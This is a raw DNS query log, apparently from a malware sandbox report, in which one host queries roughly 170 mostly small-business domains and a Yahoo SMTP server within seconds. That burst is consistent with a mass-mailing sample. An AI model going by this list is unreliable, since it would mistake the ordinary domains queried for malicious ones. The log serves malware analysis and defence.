                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.947307110 CEST192.168.2.38.8.8.80xacddStandard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.950434923 CEST192.168.2.38.8.8.80x1961Standard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.991977930 CEST192.168.2.38.8.8.80xc904Standard query (0)www.maktraxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.993314028 CEST192.168.2.38.8.8.80xef56Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.037432909 CEST192.168.2.38.8.8.80x9b50Standard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.038419008 CEST192.168.2.38.8.8.80xd85aStandard query (0)www.crcsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.048177004 CEST192.168.2.38.8.8.80x9a78Standard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.049628019 CEST192.168.2.38.8.8.80x963eStandard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.195297003 CEST192.168.2.38.8.8.80x92f8Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.237303972 CEST192.168.2.38.8.8.80x7b9cStandard query (0)www.mobilnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.240685940 CEST192.168.2.38.8.8.80x145dStandard query (0)deckoviny.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.262186050 CEST192.168.2.38.8.8.80x322bStandard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.278963089 CEST192.168.2.38.8.8.80xc365Standard query (0)www.ora-ito.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.406259060 CEST192.168.2.38.8.8.80x4b69Standard query (0)www.lrsuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.443423986 CEST192.168.2.38.8.8.80xed1bStandard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.562371016 CEST192.168.2.38.8.8.80xe599Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.567164898 CEST192.168.2.38.8.8.80xab47Standard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.665416956 CEST192.168.2.38.8.8.80x6bc7Standard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.675255060 CEST192.168.2.38.8.8.80x901aStandard query (0)ssm.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.799216986 CEST192.168.2.38.8.8.80x8225Standard query (0)www.fink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.899785042 CEST192.168.2.38.8.8.80xe9b6Standard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:52.937308073 CEST192.168.2.38.8.8.80xd67cStandard query (0)www.fe-bauer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.005064011 CEST192.168.2.38.8.8.80x9708Standard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.013258934 CEST192.168.2.38.8.8.80xef56Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.018616915 CEST192.168.2.38.8.8.80xbf5dStandard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.042169094 CEST192.168.2.38.8.8.80xc60aStandard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.060280085 CEST192.168.2.38.8.8.80xdaf0Standard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.135127068 CEST192.168.2.38.8.8.80x9bfaStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.187125921 CEST192.168.2.38.8.8.80x6088Standard query (0)www.pupi.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.238699913 CEST192.168.2.38.8.8.80xcec8Standard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.261934996 CEST192.168.2.38.8.8.80x322bStandard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.285166979 CEST192.168.2.38.8.8.80x13a2Standard query (0)akdeniz.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.431819916 CEST192.168.2.38.8.8.80xc330Standard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.439066887 CEST192.168.2.38.8.8.80xa07bStandard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.482343912 CEST192.168.2.38.8.8.80x5800Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.505413055 CEST192.168.2.38.8.8.80x2fedStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.516222954 CEST192.168.2.38.8.8.80xc5adStandard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.543114901 CEST192.168.2.38.8.8.80x7d51Standard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.600313902 CEST192.168.2.38.8.8.80x8628Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.833177090 CEST192.168.2.38.8.8.80x7c9dStandard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.872874975 CEST192.168.2.38.8.8.80xeda6Standard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:53.948472977 CEST192.168.2.38.8.8.80xc4a2Standard query (0)nels.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:54.007344961 CEST192.168.2.38.8.8.80x3e4dStandard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:54.363413095 CEST192.168.2.38.8.8.80x55a9Standard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:54.405812979 CEST192.168.2.38.8.8.80x6ff1Standard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:54.754297018 CEST192.168.2.38.8.8.80x86b3Standard query (0)www.myropcb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:54.796091080 CEST192.168.2.38.8.8.80xa984Standard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:54.819034100 CEST192.168.2.38.8.8.80x8296Standard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.300023079 CEST192.168.2.38.8.8.80xe902Standard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.312561989 CEST192.168.2.38.8.8.80x58dStandard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.314258099 CEST192.168.2.38.8.8.80xff14Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.451169968 CEST192.168.2.38.8.8.80x9ce2Standard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.454124928 CEST192.168.2.38.8.8.80x55fStandard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.457294941 CEST192.168.2.38.8.8.80x45faStandard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.675849915 CEST192.168.2.38.8.8.80xe814Standard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.720247984 CEST192.168.2.38.8.8.80xe8f3Standard query (0)smtp.mail.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.781099081 CEST192.168.2.38.8.8.80xd2e6Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:55.931642056 CEST192.168.2.38.8.8.80x666dStandard query (0)adeesa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:56.739968061 CEST192.168.2.38.8.8.80x8301Standard query (0)kumaden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:57.826330900 CEST192.168.2.38.8.8.80xda37Standard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:57.838123083 CEST192.168.2.38.8.8.80xa1caStandard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:57.839454889 CEST192.168.2.38.8.8.80x4560Standard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:57.979675055 CEST192.168.2.38.8.8.80xc9bdStandard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.045217037 CEST192.168.2.38.8.8.80x7505Standard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.045692921 CEST192.168.2.38.8.8.80xbff5Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.046264887 CEST192.168.2.38.8.8.80x2f8bStandard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.047040939 CEST192.168.2.38.8.8.80x3e6dStandard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.047683001 CEST192.168.2.38.8.8.80x3d15Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.047894955 CEST192.168.2.38.8.8.80x39d3Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.050223112 CEST192.168.2.38.8.8.80xa74cStandard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.051129103 CEST192.168.2.38.8.8.80x4036Standard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.053297997 CEST192.168.2.38.8.8.80x3521Standard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.055023909 CEST192.168.2.38.8.8.80xd238Standard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.055541039 CEST192.168.2.38.8.8.80xd1b1Standard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.055958033 CEST192.168.2.38.8.8.80xbbf8Standard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.057336092 CEST192.168.2.38.8.8.80x1a50Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.063595057 CEST192.168.2.38.8.8.80xffebStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.080779076 CEST192.168.2.38.8.8.80xc77cStandard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.083358049 CEST192.168.2.38.8.8.80x17e5Standard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.086812973 CEST192.168.2.38.8.8.80xd70eStandard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.123204947 CEST192.168.2.38.8.8.80xa292Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.125837088 CEST192.168.2.38.8.8.80xb051Standard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.128360987 CEST192.168.2.38.8.8.80x5347Standard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.129837990 CEST192.168.2.38.8.8.80x1ea9Standard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.130806923 CEST192.168.2.38.8.8.80xcb7Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.130806923 CEST192.168.2.38.8.8.80xf738Standard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.136286974 CEST192.168.2.38.8.8.80x8797Standard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.141515970 CEST192.168.2.38.8.8.80xb2c0Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.141515970 CEST192.168.2.38.8.8.80xb800Standard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.143145084 CEST192.168.2.38.8.8.80x11b0Standard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.143146038 CEST192.168.2.38.8.8.80x8b16Standard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.143958092 CEST192.168.2.38.8.8.80xbc05Standard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.143959045 CEST192.168.2.38.8.8.80xc58fStandard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.189307928 CEST192.168.2.38.8.8.80x7ef0Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.189307928 CEST192.168.2.38.8.8.80xa2dcStandard query (0)sinwal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.191299915 CEST192.168.2.38.8.8.80x95d6Standard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.191299915 CEST192.168.2.38.8.8.80x59f8Standard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.192776918 CEST192.168.2.38.8.8.80xea92Standard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.193491936 CEST192.168.2.38.8.8.80xf6caStandard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.199594975 CEST192.168.2.38.8.8.80x305bStandard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.217025042 CEST192.168.2.38.8.8.80x414Standard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.239809036 CEST192.168.2.38.8.8.80x3c13Standard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.252289057 CEST192.168.2.38.8.8.80xb449Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.259948015 CEST192.168.2.38.8.8.80xd9efStandard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.262191057 CEST192.168.2.38.8.8.80x242cStandard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.267199993 CEST192.168.2.38.8.8.80x73f2Standard query (0)106west.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.267643929 CEST192.168.2.38.8.8.80x2a6bStandard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.273988962 CEST192.168.2.38.8.8.80x3a47Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.298198938 CEST192.168.2.38.8.8.80x2dd9Standard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.305983067 CEST192.168.2.38.8.8.80x5797Standard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.308316946 CEST192.168.2.38.8.8.80x6de6Standard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.314151049 CEST192.168.2.38.8.8.80xbd1cStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.318516970 CEST192.168.2.38.8.8.80xcc76Standard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.323821068 CEST192.168.2.38.8.8.80x821fStandard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.326395988 CEST192.168.2.38.8.8.80xbd3eStandard query (0)adventist.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.326395988 CEST192.168.2.38.8.8.80xb15fStandard query (0)listel.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.327712059 CEST192.168.2.38.8.8.80xc3d6Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.329570055 CEST192.168.2.38.8.8.80x9dc2Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.333406925 CEST192.168.2.38.8.8.80x3106Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.344419956 CEST192.168.2.38.8.8.80xae47Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.358939886 CEST192.168.2.38.8.8.80x9e7fStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.361490965 CEST192.168.2.38.8.8.80x71cfStandard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.363751888 CEST192.168.2.38.8.8.80xfc67Standard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.375039101 CEST192.168.2.38.8.8.80x516fStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.381211996 CEST192.168.2.38.8.8.80xad22Standard query (0)nts-web.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.381211996 CEST192.168.2.38.8.8.80xe014Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.406198978 CEST192.168.2.38.8.8.80xb09cStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.411990881 CEST192.168.2.38.8.8.80x9f52Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.418562889 CEST192.168.2.38.8.8.80xb582Standard query (0)mackusick.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.426275015 CEST192.168.2.38.8.8.80x3d4Standard query (0)usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.439944983 CEST192.168.2.38.8.8.80xd61cStandard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.444538116 CEST192.168.2.38.8.8.80xe7e3Standard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.448554039 CEST192.168.2.38.8.8.80x5b21Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.459585905 CEST192.168.2.38.8.8.80x23e3Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.490370989 CEST192.168.2.38.8.8.80xa9c0Standard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.491849899 CEST192.168.2.38.8.8.80x8d7dStandard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.505461931 CEST192.168.2.38.8.8.80x959eStandard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.538324118 CEST192.168.2.38.8.8.80x38d3Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.557476997 CEST192.168.2.38.8.8.80x9538Standard query (0)techtrans.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.559417963 CEST192.168.2.38.8.8.80x5d01Standard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.590718031 CEST192.168.2.38.8.8.80x2670Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.602905989 CEST192.168.2.38.8.8.80x2862Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.602905989 CEST192.168.2.38.8.8.80x8e91Standard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.605937958 CEST192.168.2.38.8.8.80x12e0Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.627559900 CEST192.168.2.38.8.8.80x16c4Standard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.633172989 CEST192.168.2.38.8.8.80xbb95Standard query (0)coxkitchensandbaths.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.635727882 CEST192.168.2.38.8.8.80xbacfStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.637270927 CEST192.168.2.38.8.8.80x91ebStandard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.684370995 CEST192.168.2.38.8.8.80x8c33Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.848655939 CEST192.168.2.38.8.8.80x224Standard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.853847027 CEST192.168.2.38.8.8.80x9625Standard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.861690998 CEST192.168.2.38.8.8.80x7ac1Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.866339922 CEST192.168.2.38.8.8.80x86efStandard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.870417118 CEST192.168.2.38.8.8.80xf8a7Standard query (0)cnti.krsn.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.885202885 CEST192.168.2.38.8.8.80x1820Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.893600941 CEST192.168.2.38.8.8.80xfb35Standard query (0)pleszew.policja.gov.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.902422905 CEST192.168.2.38.8.8.80x313fStandard query (0)4locals.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.904449940 CEST192.168.2.38.8.8.80x954Standard query (0)ssm.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.910957098 CEST192.168.2.38.8.8.80x3611Standard query (0)muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.916660070 CEST192.168.2.38.8.8.80xe43bStandard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.921205044 CEST192.168.2.38.8.8.80xbfabStandard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.940637112 CEST192.168.2.38.8.8.80x1844Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.962632895 CEST192.168.2.38.8.8.80x6864Standard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.977196932 CEST192.168.2.38.8.8.80xbe9aStandard query (0)metaforacom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:58.987844944 CEST192.168.2.38.8.8.80xecc8Standard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.034543991 CEST192.168.2.38.8.8.80xa96aStandard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.059561014 CEST192.168.2.38.8.8.80x3d15Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.067491055 CEST192.168.2.38.8.8.80xdd31Standard query (0)dbnet.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.096646070 CEST192.168.2.38.8.8.80x94a2Standard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.194165945 CEST192.168.2.38.8.8.80xa042Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.208731890 CEST192.168.2.38.8.8.80x278Standard query (0)strazynski.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.212923050 CEST192.168.2.38.8.8.80x7eefStandard query (0)forbin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.223473072 CEST192.168.2.38.8.8.80x4e2bStandard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.280570030 CEST192.168.2.38.8.8.80x5cf6Standard query (0)diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:59.290790081 CEST192.168.2.38.8.8.80xc3daStandard query (0)shiner.comA (IP address)IN (0x0001)false
